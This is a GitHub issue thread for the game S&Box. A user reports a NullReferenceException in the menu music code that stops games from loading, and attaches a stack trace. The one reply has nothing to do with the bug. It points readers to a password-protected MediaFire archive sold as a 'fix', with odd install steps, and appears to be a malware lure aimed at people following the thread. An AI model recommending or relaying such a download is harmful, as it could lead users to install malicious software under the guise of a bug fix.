### ISSUE TITLE
Exception on loading game, unable to join games (Menu Music)

### ISSUE THREAD

**Issue by dimmerly** [Facepunch/sbox-issues#6316]
### Describe the bug

When loading S&Box (from fresh install), I get this exception and it makes any games unjoinable / infinite loading 

System.NullReferenceException: Object reference not set to an instance of an object.
   at MenuSystem.MenuMusic.Update() in C:\Program Files (x86)\Steam\steamapps\common\sbox\addons\menu\Code\MenuSystem.cs:line 138
   at MenuSystem.UpdateMusic() in C:\Program Files (x86)\Steam\steamapps\common\sbox\addons\menu\Code\MenuSystem.cs:line 156
   at MenuSystem.Tick() in C:\Program Files (x86)\Steam\steamapps\common\sbox\addons\menu\Code\MenuSystem.cs:line 78
   at Sandbox.MenuDll.Tick() in C:\build\_work\sbox\sbox\engine\Sandbox.Menu\MenuDll.cs:line 198
   at Sandbox.EngineLoop.FrameStart() in C:\build\_work\sbox\sbox\engine\Sandbox.Engine\EngineLoop.cs:line 161
   at Sandbox.EngineLoop.RunFrame(CMaterialSystem2AppSystemDict appDict, Boolean& wantsQuit) in C:\build\_work\sbox\sbox\engine\Sandbox.Engine\EngineLoop.cs:line 36

### To Reproduce

Launch game
![image](https://github.com/user-attachments/assets/fb7bee79-b342-4969-b120-2b4c4ed33dff)

### Expected behavior

No exception

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
